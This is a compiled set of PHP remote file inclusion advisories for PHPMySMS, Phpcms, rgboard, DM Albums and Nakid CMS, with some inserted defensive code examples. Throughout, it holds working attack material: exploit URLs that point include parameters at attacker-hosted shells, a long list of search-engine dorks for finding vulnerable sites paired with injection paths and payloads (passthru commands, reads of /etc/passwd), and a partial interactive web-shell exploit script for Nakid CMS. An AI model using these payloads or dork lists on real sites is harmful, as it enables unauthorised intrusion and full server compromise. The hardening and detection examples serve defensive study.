
PHPMySMS Remote File Inclusion Vulnerability

Date: 2023-10-06 08:18:26

The following is a compilation of seven pieces on the PHPMySMS remote file inclusion vulnerability and related remote file inclusion (RFI) advisories.


Part 1: PHPMySMS remote file inclusion vulnerability

Affected systems:

PhpMySms PhpMySms <= V2.0

Description:

--------------------------------------------------------------------------------

BUGTRAQ ID: 18633

PHPMySMS is an open-source, PHP-based web SMS solution.

PHPMySMS's implementation has an input validation vulnerability; a remote attacker may exploit it to execute arbitrary commands on the server.

A remote attacker can exploit a remote file inclusion vulnerability in PHPMySMS's gateway.php file to execute arbitrary PHP code. $ROOT_PATH is never initialised in gateway.php, so with register_globals enabled it is taken straight from the request whenever mode is not "1"; remote inclusion additionally needs allow_url_include (allow_url_fopen on older PHP), otherwise the same bug is a local file inclusion. The vulnerable code:

==============================================================

if (($_POST[mode] == "1") or ($_GET[mode] == "1")) {
    include ("config.php");
} else {
    include ("$ROOT_PATH/config.php");   // $ROOT_PATH is never set in this file
}

==============================================================

<* Source: Persian-Defacer (www.Hacking-Boys.com)

*>

Test method:

--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive and is provided for security research and teaching only;

use at your own risk!

[site]/[sms location]/sms_config/gateway.php?ROOT_PATH=[evil_script]

Recommendation:

--------------------------------------------------------------------------------

Vendor patch:

PhpMySms

--------

The vendor has not yet released a patch or upgrade; users of this software should monitor the vendor's homepage for the latest version:

Http://www.phpmysms.com
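As an added example (not PHPMySMS code; every function, path and the temp-directory layout are assumptions, and it needs PHP 8 for str_contains/str_starts_with), the following shows the `include("$ROOT_PATH/config.php")` shape next to a hardened path resolver that derives the base directory from the script location, refuses stream wrappers, and checks that the resolved file stays inside the base:

```php
<?php
// Added example (not PHPMySMS code): hardened replacement for the
// `include("$ROOT_PATH/config.php")` pattern. All names here are assumptions.
declare(strict_types=1);

// Vulnerable shape from the advisory: $ROOT_PATH is never initialised, so with
// register_globals=On the query string ?ROOT_PATH=http://attacker/ sets it.
function vulnerableIncludePath(array $globals): string
{
    $ROOT_PATH = $globals['ROOT_PATH'] ?? '';   // stands in for register_globals
    return "$ROOT_PATH/config.php";              // attacker controls the prefix
}

// Hardened: the base directory comes from the script location, never from
// request data; the resolved path must stay inside it, and stream wrappers
// (http://, ftp://, php://, data:) are refused before touching the filesystem.
function safeConfigPath(string $baseDir, string $relative): ?string
{
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $relative) || str_contains($relative, "\0")) {
        return null;                              // URL / wrapper / NUL byte
    }
    $base   = realpath($baseDir);
    $target = realpath($baseDir . DIRECTORY_SEPARATOR . $relative);
    if ($base === false || $target === false) {
        return null;                              // missing file: do not include
    }
    if (!str_starts_with($target, $base . DIRECTORY_SEPARATOR)) {
        return null;                              // ../ traversal escaped the base
    }
    return $target;
}

// Demonstration on a constructed layout in a temporary directory.
function demo(): array
{
    $base = sys_get_temp_dir() . '/sms_demo_' . getmypid();
    mkdir($base, 0700, true);
    file_put_contents("$base/config.php", "<?php return ['db' => 'sms'];\n");

    $results = [
        'vuln'      => vulnerableIncludePath(['ROOT_PATH' => 'http://attacker.example/']),
        'legit'     => safeConfigPath($base, 'config.php'),
        'remote'    => safeConfigPath($base, 'http://attacker.example/config.php'),
        'traversal' => safeConfigPath($base, '../../etc/passwd'),
    ];
    unlink("$base/config.php");
    rmdir($base);
    return $results;
}

if (PHP_SAPI === 'cli') {
    foreach (demo() as $case => $path) {
        printf("%-10s %s\n", $case, $path ?? 'REJECTED');
    }
}
```

Only the `legit` case yields a path; `remote` is rejected by the wrapper check and `traversal` by the containment check. Note that realpath() on a URL returns false anyway, but rejecting wrappers first avoids a network round-trip and closes the php:// and data: cases that never reach the filesystem.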

Part 2: Phpcms remote file inclusion vulnerability

Pseudocode:

$rootdir = str_replace("\\", '/', dirname(__FILE__));

// the following is the code pulled in by require $rootdir.'/include/common.inc.php';
@extract($_POST, EXTR_OVERWRITE);
@extract($_GET, EXTR_OVERWRITE);
unset($_POST, $_GET);

require $rootdir.'/web/admin/include/common.inc.php';
?>

What do readers make of this? If you trace it statically with grep or similar tools, you will very likely miss it, because the analysis result you get is:

$rootdir = str_replace("\\", '/', dirname(__FILE__));
require $rootdir.'/include/common.inc.php';
require $rootdir.'/web/admin/include/common.inc.php';

Seeing that $rootdir has been sanitized, would you assume this is safe?

So relying purely on grep-style static searching will not find bugs like this...

In hindsight, grey-box testing works well for this kind of bug: first read the code and spot the variable overwrite in the common.inc.php "trunk", then black-box test which variables can be overwritten.....

Part 3: Phpcms remote file inclusion vulnerability (advisory)

[repost] Phpcms 2007 remote file inclusion vulnerability

url:www.wolvez.org/forum/redirect.php?tid=182&goto=lastpost

This is a fairly ordinary variable-overwrite vulnerability; it is reposted here because finding it by white-box review requires reading the code carefully :)

Quote:

------------------------------------------------

// read from the top

$rootdir = str_replace("\\", '/', dirname(__FILE__));
require $rootdir.'/include/common.inc.php';   // via extract, $rootdir can be overwritten with an arbitrary value
require PHPCMS_ROOT.'/languages/'.$CONFIG['adminlanguage'].'/yp_admin.lang.php';
if(!$_username) showmessage($LANG['please_login'],$PHPCMS['siteurl'].'member/login.php?forward='.$PHP_URL);
require $rootdir.'/web/admin/include/common.inc.php';   // triggers the remote file inclusion

------------------------------------------------

Note the two requires: the first pulls in the code that calls extract, and only the second one triggers the vulnerability.


Part 4: rgboard 3.0.12 remote file inclusion vulnerability

Infos: rgboard 3.0.12 remote file inclusion vulnerability

Author: Flyh4t[w.s.t]

rgboard 3.0.12 is a Korean forum program; search Google for rgboard to find sites running it.

vul code:

\include\bbs.lib.inc.php:

if (!defined('BBS_LIB_INC_INCLUDED')) {
define('BBS_LIB_INC_INCLUDED', 1);
// *-- BBS_LIB_INC_INCLUDED START --*
if(!$site_path) $site_path='./';
require_once "{$site_path}include/lib.inc.php";

// $site_path is included without any filtering

poc:

Put a PHP shell on your own site at the directory and file name /include/lib.inc.php

then request

http://www.target.com/include/bbs.lib.inc.php?site_path=yoursite/
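The two overwrite shapes from Parts 2 to 4 side by side, as an added example (not Phpcms or rgboard code; function names and the `$globals` array standing in for register_globals are assumptions). It shows why the grep result in Part 2 is misleading: `$rootdir` really is assigned safely, and is then replaced by `extract()` in the same scope, and why rgboard's "default only if empty" never protects a variable that request data has already filled in:

```php
<?php
// Added example (not Phpcms or rgboard code): how extract($_GET, EXTR_OVERWRITE)
// and a register_globals-style pre-filled variable let a request replace the
// base path used by a later require. All names are assumptions.
declare(strict_types=1);

// Phpcms shape: $rootdir is derived from __FILE__ and looks safe, but the
// common include then extracts the request into the same scope and replaces it.
function phpcmsRequirePath(array $get): string
{
    $rootdir = str_replace('\\', '/', dirname(__FILE__));
    extract($get, EXTR_OVERWRITE);                 // ?rootdir=http://evil wins
    return $rootdir . '/web/admin/include/common.inc.php';
}

// Fix: EXTR_SKIP never overwrites a variable that already exists (or use
// EXTR_PREFIX_ALL so request keys can never collide with internal names).
function phpcmsRequirePathFixed(array $get): string
{
    $rootdir = str_replace('\\', '/', dirname(__FILE__));
    extract($get, EXTR_SKIP);                      // existing $rootdir is kept
    return $rootdir . '/web/admin/include/common.inc.php';
}

// rgboard shape: the default applies only when $site_path is empty, and under
// register_globals the query string has already filled it in.
function rgboardRequirePath(array $globals): string
{
    $site_path = $globals['site_path'] ?? null;    // stands in for register_globals
    if (!$site_path) $site_path = './';
    return "{$site_path}include/lib.inc.php";
}

// Fix: assign the base unconditionally from the script location.
function rgboardRequirePathFixed(): string
{
    $site_path = dirname(__FILE__) . '/';
    return "{$site_path}include/lib.inc.php";
}

function demo(): array
{
    return [
        'phpcms'        => phpcmsRequirePath(['rootdir' => 'http://attacker.example']),
        'phpcms_fixed'  => phpcmsRequirePathFixed(['rootdir' => 'http://attacker.example']),
        'rgboard'       => rgboardRequirePath(['site_path' => 'http://attacker.example/']),
        'rgboard_fixed' => rgboardRequirePathFixed(),
    ];
}

if (PHP_SAPI === 'cli') {
    foreach (demo() as $case => $path) {
        printf("%-14s %s\n", $case, $path);
    }
}
```

The two unfixed cases return paths beginning with http://attacker.example, the fixed ones return paths under the script's own directory. EXTR_SKIP only protects variables assigned before the extract; anything the code reads without initialising first remains reachable, which is the rgboard case.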

Part 5: WordPress plugin DM Albums 1.9.2 remote file inclusion vulnerability

Discussion thread: bbs.7747.net/read.php?tid=89415

Posted by: Crackkey, Red Alliance (www.7747.net)

#############################################################################################

[+] DM Albums™ 1.9.2 & WordPress Plug-in Remote File Include Vulnerability

[+] Author : Septemb0x

[+] www.Cyber-Warrior.Org - Information Technology's World

[+] Greetz : BARCOD3 And All Friends...

[+] Dork : none

[+] Download Script. wordpress.org/extend/plugins/dm-albums/

#############################################################################################

[+] NORMAL EXPLOIT;

[+] [sitename]/[path]/template/album.php?SECURITY_FILE=attackersite/shell.php

[+] WORDPRESS EXPLOIT

[+] [sitename]/[path]/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=attackersite/shell.php

#############################################################################################


# CrackkeyNet .06.29

www.fvcking.cn

Part 6: Some remote file inclusion vulnerabilities: Remote File Inclusion list [ with d0rkz ]

Source: x140yu

1. allinurl:my_egallery site:.org

/modules/My_eGallery/public/displayCategory.php?basepath=

2. allinurl:xgallery site:.org

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

3. allinurl:coppermine site:.org

/modules/coppermine/themes/default/theme.php?THEME_DIR=

4. allinurl:4nAlbum site:.org

/modules/4nAlbum/public/displayCategory.php?basepath=

5. allinurl:PNphpBB2 site:.org

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

6. allinurl:ihm.php?p=

7. Keyword : "powered by AllMyLinks"

/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

8. allinurl:/modules.php?name=allmyguests

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

9. allinurl:/Popper/index.php?

/Popper/index.php?childwindow.inc.php?form=

10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php

yahoo = by Kietu? v 3.2

/kietu/index.php?kietu[url_hit]=

11. keyword : "Powered by phpBB 2.0.6"

/html&highlight=%2527.include($_GET[a]),exit.%2527&a=

12. keyword : "powered by CubeCart 3.0.6"

/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

13. keyword : "powered by paBugs 2.0 Beta 3"

/class.mysql.php?path_to_bt_dir=

14. allinurl:"powered by AshNews", allinurl:AshNews or allinurl: /ashnews.php

/ashnews.php?pathtoashnews=

15. keyword : /phorum/login.php

/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

16. allinurl:ihm.php?p=*

17. keyword : "powered eyeOs"

/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id

replace with:

/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=

18. allinurl:.php?bodyfile=

19. allinurl:/includes/orderSuccess.inc.php?glob=

/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

20. allinurl:modules.php?name=Forums

/modules.php?name=

21. allinurl:/default.php?page=home

22. allinurl:/folder.php?id=

23. allinurl:main.php?pagina=

/paginedinamiche/main.php?pagina=

24. Key Word: ( Nuke ET Copyright por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests" )

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

25. allinurl:application.php?base_path=

/application.php?base_path=

26. allinurl:phplivehelper

/phplivehelper/initiate.php?abs_path=

27. allinurl:phpnuke

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

28. key word : "powered by Fantastic News v2.1.2"

/archive.php?CONFIG[script_path]=

29. keyword: "powered by smartblog" AND inurl:?page=login

/index.php?page=

30. allinurl:/forum/

/forum/admin/index.php?inc_conf=

31. keyword:"Powered By FusionPHP"

/templates/headline_temp.php?nst_inc=

32. allinurl:shoutbox/expanded.php filetype:php

/shoutbox/expanded.php?conf=

33. allinurl: /osticket/

/osticket/include/main.php?config[search_disp]=true&include_dir=

34. keyword : "Powered by iUser"

/common.php?include_path=

35. allinurl: "static.php?load="

/static.php?load=

36. keyword : /phpcoin/login.php

/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

37. keyword: allinurl:/phpGedview/login.php site:

/help_text_vars.php?dir&PGV_BASE_DIRECTORY=

38. allinurl:/folder.php?id=

/classes.php?LOCAL_PATH=

39. phpGedView 2.65.1

I - PHP Injection or arbitrary file access

(HIGH Risk BUT user must be Admin)

- -- HTTP Request --

[target]/[phpGedView-directory]/editconfig_gedcom.php?gedcom_config=../../../../../../etc/passwd

or

[target]/[phpGedView-directory]/editconfig_gedcom.php

POSTDATA: gedcom_config=../../../../../../etc/passwd

- -- HTTP Request --

Code impacted : editconfig_gedcom.php

if (empty($gedcom_config)) {
    if (!empty($_POST["gedcom_config"])) $gedcom_config = $_POST["gedcom_config"];
    else $gedcom_config = "config_gedcom.php";
}

require($gedcom_config);

The POST request works even if PHP register_globals is Off, because the code reads $_POST explicitly; the GET form relies on register_globals to populate $gedcom_config.

-------------------------------------------

II - PHP Injection

(HIGH Risk no authentication needed)

- -- HTTP Request --

[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=attacker&THEME_DIR=/

- -- HTTP Request --

Code impacted : [GED_File]_conf.php

if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php")) require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");
else {
    $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
    require($THEME_DIR."theme.php");
}

The require call is only vulnerable when PHP register_globals is On.

In that case you first have to obtain the name of the GEDCOM file in use: request [target]/session.php, and the GEDCOM file name appears as an argument of the login.php call.

The attacker has to create, on their web site, a directory called themes/standard containing a file theme.php (file_exists() cannot stat an http:// path, so the first branch fails and the else branch builds $PGV_BASE_DIRECTORY."themes/standard/theme.php" from the attacker's base).

For example: theme.php = <?php phpinfo(); ?>

and the request will execute phpinfo() on the vulnerable target.

40. inurl:signup.php?usertype=pf

www.contoh.com/common.inc.php?CFG[libdir]=www.geocities.com/k4k3_rgb/test?cmd

=============================================================================

/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

/includes/header.php?systempath=

/Gallery/displayCategory.php?basepath=

/index.inc.php?PATH_Includes=

/nphp/nphpd.php?nphp_config[LangFile]=

/include/db.php?GLOBALS[rootdp]=

/ashnews.php?pathtoashnews=

/ashheadlines.php?pathtoashnews=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/demo/includes/init.php?user_inc=

/jaf/index.php?show=

/inc/shows.inc.php?cutepath=

/poll/admin/common.inc.php?base_path=

/pollvote/pollvote.php?pollname=

/sources/post.php?fil_config=

/modules/My_eGallery/public/displayCategory.php?basepath=

/bb_lib/checkdb.inc.php?libpach=

/include/livre_include.php?no_connect=lol&chem_absolu=

/index.php?from_market=Y&pageurl=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/pivot/modules/module_db.php?pivot_path=

/modules/4nAlbum/public/displayCategory.php?basepath=

/derniers_commentaires.php?rep=

/modules/coppermine/themes/default/theme.php?THEME_DIR=

/modules/coppermine/include/init.inc.php?CPG_M_DIR=

/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

/coppermine/themes/maze/theme.php?THEME_DIR=

/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

/myPHPCalendar/admin.php?cal_dir=

/agendax/addevent.inc.php?agendax_path=

/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

/main.php?page=

/default.php?page=

/index.php?action=

/index1.php?p=

/index2.php?x=

/index2.php?content=

/index.php?conteudo=

/index.php?cat=

/include/new-visitor.inc.php?lvc_include_dir=

/modules/agendax/addevent.inc.php?agendax_path=

/shoutbox/expanded.php?conf=

/library/editor/editor.php?root=

/library/lib.php?root=

/e107/e107_handlers/secure_img_render.php?p=

/zentrack/index.php?configFile=

/main.php?x=

/becommunity/community/index.php?pageurl=

/GradeMap/index.php?page=

/index4.php?body=

/side/index.php?side=

/cgi-bin/diary/sdy.cgi?md=past&tg=200405.dat|uname%20-a|

/es/index.php?action=

/index.php?sec=

/index.php?main=

/index.php?menu=

/html/page.php?page=

/page.php?view=

/main.php?view=

/index.php?page=

/content.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/phpBB2/viewtopic.php?t=36&highlight=%2527.passthru($HTTP_GET_VARS[sh]).%2527&sh=ls%20-al

/forumlinux/viewtopic.php?t=29%20&highlight=%2527&highlight=%2527.passthru($HTTP_GET_VARS[CMD]).%2527&CMD=ls%20-al;

/index.php?show=

/tutorials/print.php?page=

/index.php?level=

/index.php?file=

/index.php?inter_url=

/index2.php?menu=

/index1.php?main=

/index1.php?nav=

/index1.php?link=

/index2.php?page=

/index.php?myContent=

/index.php?TWC=

/index.php?babInstallPath=

/main.php?body=

/index.php?z=

/cgi-bin/site/session.cgi?page=links.html|cat /etc/passwd|

/forums/viewtopic.php?t=4&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=dir%20....

/phpBB2/viewtopic.php?t=7&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd

/forum/viewtopic.php?t=232&highlight=%2527.phpinfo().%2527

/viewtopic.php?t=1&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527&a=id;pwd

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

allinurl:/index.php?page= site:*.dk

allinurl:"pnphpbb2"

inurl:/allmyguest

allinurl:/index.php?file= site:*.dk

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
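Every probe in the list above has the same shape: a query parameter whose value is a URL or a PHP stream wrapper. The following added example (not part of the source list; the log lines are constructed, and the parameter names are only illustrative) parses access-log lines in combined format and flags that shape, including array-style parameters such as glob[rootDir] that arrive URL-encoded:

```php
<?php
// Added example (not from the source list): scan web-server access-log lines
// for the RFI probe shape catalogued above, i.e. a query parameter whose value
// is a URL or PHP stream wrapper. Log lines below are constructed, not real.
declare(strict_types=1);

const RFI_VALUE = '#^(?:https?|ftps?|php|data|expect|phar|zip)://|^data:#i';

// Parse one "combined"-format line into method, path and decoded query map.
function parseAccessLine(string $line): ?array
{
    if (!preg_match('#"(GET|POST|HEAD) (\S+) HTTP/[\d.]+"#', $line, $m)) {
        return null;
    }
    $url = parse_url($m[2]);
    if ($url === false) {
        return null;
    }
    $params = [];
    parse_str($url['query'] ?? '', $params);       // also decodes %5B..%5D keys
    return ['method' => $m[1], 'path' => $url['path'] ?? '', 'params' => $params];
}

// Flatten nested arrays so glob[rootDir]=... is reported under its full name.
function flattenParams(array $params, string $prefix = ''): array
{
    $out = [];
    foreach ($params as $key => $value) {
        $name = $prefix === '' ? (string)$key : "{$prefix}[{$key}]";
        if (is_array($value)) {
            $out += flattenParams($value, $name);
        } else {
            $out[$name] = (string)$value;
        }
    }
    return $out;
}

// Suspicious parameters of one request: name => decoded value. Empty if clean.
function rfiIndicators(array $params): array
{
    $hits = [];
    foreach (flattenParams($params) as $name => $value) {
        $decoded = rawurldecode($value);          // unwrap one extra encoding layer
        if (preg_match(RFI_VALUE, $decoded) || str_contains($decoded, "\0")) {
            $hits[$name] = $decoded;
        }
    }
    return $hits;
}

// Scan lines; returns [1-based line number => ['path' => ..., 'indicators' => ...]].
function scanLog(array $lines): array
{
    $findings = [];
    foreach ($lines as $i => $line) {
        $req = parseAccessLine($line);
        if ($req === null) {
            continue;
        }
        $hits = rfiIndicators($req['params']);
        if ($hits !== []) {
            $findings[$i + 1] = ['path' => $req['path'], 'indicators' => $hits];
        }
    }
    return $findings;
}

// Constructed sample modelled on the probe URLs in the list (203.0.113.0/24 and
// 198.51.100.0/24 are documentation address ranges).
const SAMPLE_LOG = [
    '203.0.113.9 - - [06/Oct/2023:08:18:26 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [06/Oct/2023:08:18:27 +0000] "GET /sms_config/gateway.php?ROOT_PATH=http://198.51.100.7/x.txt? HTTP/1.1" 200 91 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [06/Oct/2023:08:18:28 +0000] "GET /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob%5BrootDir%5D=ftp://198.51.100.7/ HTTP/1.1" 200 91 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [06/Oct/2023:08:18:29 +0000] "GET /index.php?page=php://input HTTP/1.1" 200 91 "-" "Mozilla/5.0"',
];

if (PHP_SAPI === 'cli') {
    foreach (scanLog(SAMPLE_LOG) as $lineNo => $f) {
        foreach ($f['indicators'] as $param => $value) {
            printf("line %d: %s  %s=%s\n", $lineNo, $f['path'], $param, $value);
        }
    }
}
```

Lines 2 to 4 are reported (ROOT_PATH, glob[rootDir] and page respectively); line 1 is clean. The scanner deliberately ignores the phpBB highlight payloads in the list, which are code injection rather than file inclusion and need a different rule.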

Part 7: Nakid CMS 0.5.2 FCKeditor upload and remote file inclusion vulnerabilities (advisory)

Nakid CMS has two vulnerabilities: a file upload vulnerability in the bundled FCKeditor editor, and a remote file inclusion vulnerability in the photo upload page upload_photo.php.

1. FCKeditor file upload vulnerability

Vulnerable file: path/includes/js/fckeditor/editor/filemanager/connectors/php/config.php

Code:

// SECURITY: You must explicitly enable this "connector". (Set it to "true").

$Config['Enabled'] = true ;

// Path to user files relative to the document root.
$Config['UserFilesPath'] = '/nakid_uploads/' ;
//$Config['UserFilesPath'] = '/userfiles/' ;

// Fill the following value it you prefer to specify the absolute path for the
// user files directory. Usefull if you are using a virtual directory, symbolic
// link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
// Attention: The above 'UserFilesPath' must point to the same directory.

// What the user can do with this connector.
$Config['ConfigAllowedCommands'] = array('QuickUpload', 'FileUpload', 'GetFolders', 'GetFoldersAndFiles', 'CreateFolder') ;

$Config['AllowedExtensions']['File']   = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', [....]
$Config['DeniedExtensions']['File']    = array() ;

$Config['AllowedExtensions']['Image']  = array('bmp','gif','jpeg','jpg','png') ;
$Config['DeniedExtensions']['Image']   = array() ;

$Config['AllowedExtensions']['Flash']  = array('swf','flv') ;
$Config['DeniedExtensions']['Flash']   = array() ;

$Config['AllowedExtensions']['Media']  = array('aiff', 'asf', 'avi', 'bmp', 'fla', 'flv', 'gif', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'png', 'qt', 'ram', 'rm', 'rmi', 'rmvb', 'swf', 'tif', 'tiff', 'wav', 'wma', 'wmv') ;
$Config['DeniedExtensions']['Media']   = array() ;

Nakid CMS ships FCKeditor with the connector enabled and its default configuration, which does not strictly filter the upload parameters, so an executable script can be uploaded. The exploit below names the file 0k.php.<allowed extension>: the final extension passes the allow-list, while a server that maps every .php segment to the PHP handler (Apache's mod_mime multi-extension handling) still executes it.

Exploit (the opening of the script, the `upload()` helper that performs the multipart upload and returns the extension used, and the `http_send()` helper are not reproduced on the page):

<?php
if ($argc < 3) {
    print "\nUsage......: php $argv[0] host path\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /Nakid/\n";
    die();
}
$host = $argv[1];
$path = $argv[2];
// upload() and http_send() are referenced but not reproduced on the page.
if (!($ext = upload())) die("\n\n[-] Exploit failed You are not lucky...\n");
else print "\n[-] Shell uploaded in progress...!\n";
// STDIN is already defined by the CLI SAPI, so the original define() is not needed.
while (1) {
    print "\nNakid-shell# ";
    $cmd = trim(fgets(STDIN));
    if ($cmd != "exit") {
        // the uploaded shell is 0k.php.<allowed ext>; the command travels base64-encoded in a Cmd header
        $packet  = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Cmd: " . base64_encode($cmd) . "\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $html = http_send($host, $packet);
        // the shell wraps command output in _code_ markers
        if (stripos($html, "_code_") === false) die("\n[-] Exploit failed You are not lucky...\n");
        $shell = explode("_code_", $html);
        print "\n{$shell[1]}";
    } else break;
}
?>
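As an added example (not Nakid CMS or FCKeditor code; function names and the extension lists are assumptions), a filename check that closes the 0k.php.<ext> trick used by the exploit above. It treats every dot-separated segment as an extension, the way Apache's mod_mime does, rather than only the last one, and then discards the user-chosen name entirely:

```php
<?php
// Added example (not Nakid CMS / FCKeditor code): a filename check that rejects
// double-extension uploads such as 0k.php.gif. Names and lists are assumptions.
declare(strict_types=1);

// Extensions that common web servers may hand to a script handler.
const EXECUTABLE_EXTS = [
    'php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phps', 'phar',
    'cgi', 'pl', 'py', 'sh', 'htaccess', 'asp', 'aspx', 'jsp',
];

// True only if the last extension is allow-listed AND no earlier segment
// is something a server might execute (mod_mime checks every segment).
function isSafeUploadName(string $name, array $allowed): bool
{
    $base = basename(str_replace('\\', '/', $name));   // drop any path component
    if ($base === '' || str_contains($base, "\0")) {
        return false;
    }
    $parts = explode('.', strtolower($base));
    if (count($parts) < 2) {
        return false;                                   // no extension at all
    }
    $last = array_pop($parts);
    if (!in_array($last, $allowed, true)) {
        return false;
    }
    foreach ($parts as $segment) {                      // "0k", "php" for 0k.php.gif
        if (in_array($segment, EXECUTABLE_EXTS, true)) {
            return false;
        }
    }
    return true;
}

// Stored name: a random stem plus the verified extension, never the user's stem.
function sanitizeUploadName(string $name, array $allowed): ?string
{
    if (!isSafeUploadName($name, $allowed)) {
        return null;
    }
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return bin2hex(random_bytes(8)) . '.' . $ext;
}

function demo(): array
{
    $imageExts = ['bmp', 'gif', 'jpeg', 'jpg', 'png'];   // FCKeditor's Image list
    return [
        'photo.jpg'    => sanitizeUploadName('photo.jpg', $imageExts),
        '0k.php.gif'   => sanitizeUploadName('0k.php.gif', $imageExts),
        'shell.php'    => sanitizeUploadName('shell.php', $imageExts),
        '../x.png'     => sanitizeUploadName('../x.png', $imageExts),
        '.htaccess'    => sanitizeUploadName('.htaccess', $imageExts),
    ];
}

if (PHP_SAPI === 'cli') {
    foreach (demo() as $input => $stored) {
        printf("%-12s %s\n", $input, $stored ?? 'REJECTED');
    }
}
```

Only photo.jpg and ../x.png (after basename()) are accepted, each stored under a random name; 0k.php.gif, shell.php and .htaccess are rejected. Pair this with an upload directory that has script execution disabled, since an allow-list alone cannot anticipate every handler mapping a server may have.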

2. Remote file inclusion vulnerability:

Exploit: 127.0.0.1/modules/catalog/upload_photo.php?core[system_path]=www.hackqing.cn/shell.txt?

Official download: sourceforge.net/projects/nakidcms/files/Nakid%20CMS%20v_0_5_2.rar/download
